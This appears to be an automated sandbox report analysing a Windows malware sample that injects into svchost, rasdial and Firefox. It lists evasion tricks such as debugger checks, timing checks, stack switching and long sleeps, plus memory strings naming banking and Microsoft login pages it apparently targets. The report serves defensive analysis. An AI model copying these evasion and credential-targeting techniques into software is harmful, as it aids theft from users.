                Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000007.00000002.3386629794.0000000004EEC000.00000004.10000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3384731505.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000009.00000000.2522280502.0000000002CCC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2741446347.000000003FCBC000.00000004.80000000.00040000.00000000.sdmp
                Source: fFoOcuxK7M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: fFoOcuxK7M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: fFoOcuxK7M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: fFoOcuxK7M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: fFoOcuxK7M.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000C4B37 LoadLibraryA,GetProcAddress,0_2_000C4B37
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000CC4C6 push A3000CBAh; retn 000Ch0_2_000CC50D
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000E8945 push ecx; ret 0_2_000E8958
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_014CC99F push ss; retn 0019h0_2_014CC9DC
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_014CC8A5 push ds; retf 0019h0_2_014CC99C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403100 push eax; ret 2_2_00403102
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E9B7 push esp; ret 2_2_0041E9BF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D307 push edx; ret 2_2_0040D30E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417333 push ecx; retf 2_2_00417336
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411C05 push esi; iretd 2_2_00411C1E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411C13 push esi; iretd 2_2_00411C1E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00427C33 push eax; iretd 2_2_00427CA9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00425553 push ds; iretd 2_2_00425554
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D53D push esi; retf 2_2_0040D53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004045F9 push ds; ret 2_2_004045FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418605 push ebp; retf 2_2_00418633
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413FD3 push 8BA57A45h; iretd 2_2_00413FEA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370225F pushad ; ret 2_2_037027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037027FA pushad ; ret 2_2_037027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD push ecx; mov dword ptr [esp], ecx2_2_037309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370283D push eax; iretd 2_2_03702858
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_000C48D7
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_00145376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00145376
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000E3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_000E3187
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeAPI/Special instruction interceptor: Address: 14CFC44
                Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Windows\SysWOW64\rasdial.exeWindow / User API: threadDelayed 9840Jump to behavior
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-102527
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeAPI coverage: 4.6 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\rasdial.exe TID: 3052Thread sleep count: 132 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exe TID: 3052Thread sleep time: -264000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exe TID: 3052Thread sleep count: 9840 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exe TID: 3052Thread sleep time: -19680000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe TID: 3496Thread sleep time: -45000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\rasdial.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_0012445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0012445A
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_0012C6D1 FindFirstFileW,FindClose,0_2_0012C6D1
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_0012C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0012C75C
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_0012EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0012EF95
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_0012F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0012F0F2
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_0012F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0012F3F3
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_001237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001237EF
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_00123B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00123B12
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_0012BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0012BCBC
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000C49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000C49A0
                Source: a155F05G.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: a155F05G.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: a155F05G.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: a155F05G.7.drBinary or memory string: discord.comVMware20,11696487552f
                Source: a155F05G.7.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: rasdial.exe, 00000007.00000002.3389284232.0000000007A54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: swordVMware20,11
                Source: a155F05G.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: a155F05G.7.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: a155F05G.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: a155F05G.7.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: a155F05G.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: a155F05G.7.drBinary or memory string: global block list test formVMware20,11696487552
                Source: rasdial.exe, 00000007.00000002.3389284232.0000000007A54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n PasswordVMware]
                Source: rasdial.exe, 00000007.00000002.3389284232.0000000007A54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,116
                Source: rasdial.exe, 00000007.00000002.3389284232.0000000007A54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: omVMware20,11696
                Source: a155F05G.7.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: rasdial.exe, 00000007.00000002.3384731505.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, TrOCMVbhcDRPP.exe, 00000009.00000002.3385317301.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2743821974.000002887FD0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: a155F05G.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: rasdial.exe, 00000007.00000002.3389284232.0000000007A54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs.co.inVMware20
                Source: a155F05G.7.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: a155F05G.7.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: a155F05G.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: a155F05G.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: a155F05G.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: a155F05G.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: a155F05G.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: a155F05G.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: a155F05G.7.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: a155F05G.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: a155F05G.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: a155F05G.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: a155F05G.7.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: a155F05G.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: a155F05G.7.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: a155F05G.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: a155F05G.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: a155F05G.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417903 LdrLoadDll,2_2_00417903
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_00133F09 BlockInput,0_2_00133F09
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000C3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_000C3B3A
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000F5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_000F5A7C
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_000C4B37 LoadLibraryA,GetProcAddress,0_2_000C4B37
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_014CE880 mov eax, dword ptr fs:[00000030h]0_2_014CE880
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_014CFF10 mov eax, dword ptr fs:[00000030h]0_2_014CFF10
                Source: C:\Users\user\Desktop\fFoOcuxK7M.exeCode function: 0_2_014CFEB0 mov eax, dword ptr fs:[00000030h]0_2_014CFEB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D437C mov eax, dword ptr fs:[00000030h]2_2_037D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA352 mov eax, dword ptr fs:[00000030h]2_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8350 mov ecx, dword ptr fs:[00000030h]2_2_037D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C310 mov ecx, dword ptr fs:[00000030h]2_2_0372C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750310 mov ecx, dword ptr fs:[00000030h]2_2_03750310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037663FF mov eax, dword ptr fs:[00000030h]2_2_037663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov ecx, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov ecx, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC3CD mov eax, dword ptr fs:[00000030h]2_2_037EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B63C0 mov eax, dword ptr fs:[00000030h]2_2_037B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380634F mov eax, dword ptr fs:[00000030h]2_2_0380634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372826B mov eax, dword ptr fs:[00000030h]2_2_0372826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A250 mov eax, dword ptr fs:[00000030h]2_2_0372A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736259 mov eax, dword ptr fs:[00000030h]2_2_03736259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov eax, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov ecx, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372823B mov eax, dword ptr fs:[00000030h]2_2_0372823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038062D6 mov eax, dword ptr fs:[00000030h]2_2_038062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
